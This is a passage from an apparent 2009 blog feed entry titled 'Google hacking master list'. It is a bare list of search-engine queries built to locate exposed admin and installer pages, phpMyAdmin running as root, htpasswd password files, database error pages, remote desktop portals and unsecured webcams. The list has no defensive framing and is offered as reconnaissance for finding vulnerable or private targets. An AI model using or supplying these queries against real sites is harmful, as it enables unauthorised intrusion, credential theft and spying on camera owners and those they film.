SQL command&lt;br /&gt;ORA-00936: missing expression&lt;br /&gt;PHP application warnings failing "include_path"&lt;br /&gt;sitebuildercontent&lt;br /&gt;sitebuilderfiles&lt;br /&gt;sitebuilderpictures&lt;br /&gt;Snitz! forums db path error&lt;br /&gt;SQL syntax error&lt;br /&gt;Supplied argument is not a valid PostgreSQL result&lt;br /&gt;warning "error on line" php sablotron&lt;br /&gt;Windows 2000 web server error messages&lt;br /&gt;"ftp://" "www.eastgame.net"&lt;br /&gt;"html allowed" guestbook&lt;br /&gt;: vBulletin Version 1.1.5"&lt;br /&gt;"Select a database to view" intitle:"filemaker pro"&lt;br /&gt;"set up the administrator user" inurl:pivot&lt;br /&gt;"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row&lt;br /&gt;"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin&lt;br /&gt;"Welcome to Intranet"&lt;br /&gt;"Welcome to PHP-Nuke" congratulations&lt;br /&gt;"Welcome to the Prestige Web-Based Configurator"&lt;br /&gt;"YaBB SE Dev Team"&lt;br /&gt;"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos&lt;br /&gt;("Indexed.By"|"Monitored.By") hAcxFtpScan&lt;br /&gt;(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)&lt;br /&gt;allinurl:"index.php" "site=sglinks"&lt;br /&gt;allinurl:install/install.php&lt;br /&gt;allinurl:intranet admin&lt;br /&gt;filetype:cgi inurl:"fileman.cgi"&lt;br /&gt;filetype:cgi inurl:"Web_Store.cgi"&lt;br /&gt;filetype:php inurl:vAuthenticate&lt;br /&gt;filetype:pl intitle:"Ultraboard Setup"&lt;br /&gt;Gallery in configuration mode&lt;br /&gt;Hassan Consulting's Shopping Cart Version 1.18&lt;br /&gt;intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -&lt;br /&gt;intitle:"Gateway Configuration Menu"&lt;br /&gt;intitle:"Horde :: My Portal" -"[Tickets"&lt;br /&gt;intitle:"Mail Server CMailServer Webmail" "5.2"&lt;br /&gt;intitle:"MvBlog powered"&lt;br /&gt;intitle:"Remote Desktop Web Connection"&lt;br /&gt;intitle:"Samba Web Administration Tool" intext:"Help Workgroup"&lt;br /&gt;intitle:"Terminal Services Web Connection"&lt;br /&gt;intitle:"Uploader - Uploader v6" -pixloads.com&lt;br /&gt;intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com&lt;br /&gt;intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"&lt;br /&gt;intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"&lt;br /&gt;inurl:"/NSearch/AdminServlet"&lt;br /&gt;inurl:"index.php? module=ew_filemanager"&lt;br /&gt;inurl:aol*/_do/rss_popup?blogID=&lt;br /&gt;inurl:footer.inc.php&lt;br /&gt;inurl:info.inc.php&lt;br /&gt;inurl:ManyServers.htm&lt;br /&gt;inurl:newsdesk.cgi? inurl:"t="&lt;br /&gt;inurl:pls/admin_/gateway.htm&lt;br /&gt;inurl:rpSys.html&lt;br /&gt;inurl:search.php vbulletin&lt;br /&gt;inurl:servlet/webacc&lt;br /&gt;natterchat inurl:home.asp -site:natterchat.co.uk&lt;br /&gt;XOOPS Custom Installation&lt;br /&gt;inurl:htpasswd filetype:htpasswd&lt;br /&gt;inurl:yapboz_detay.asp + View Webcam User Accessing&lt;br /&gt;allinurl:control/multiview&lt;br /&gt;inurl:"ViewerFrame?Mode="&lt;br /&gt;intitle:"WJ-NT104 Main Page"&lt;br /&gt;inurl:netw_tcp.shtml&lt;br /&gt;intitle:"supervisioncam protocol"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5810858978506140718-2770364711742658683?l=jerichositumorang.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jerichositumorang.blogspot.com/feeds/2770364711742658683/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5810858978506140718&amp;postID=2770364711742658683' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/2770364711742658683'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/2770364711742658683'/><link rel='alternate' type='text/html' href='http://jerichositumorang.blogspot.com/2009/03/google-hacking-master-list.html' title='Google hacking master list'/><author><name>Jericho PS</name><uri>http://www.blogger.com/profile/10905013783242426389</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_8QcVoMNZWbc/TI5GPFjwDGI/AAAAAAAAABk/MKgAwcHpGxM/S220/100_2302+(Small).JPG'/></author><thr:total>1</thr:total></entry></feed>
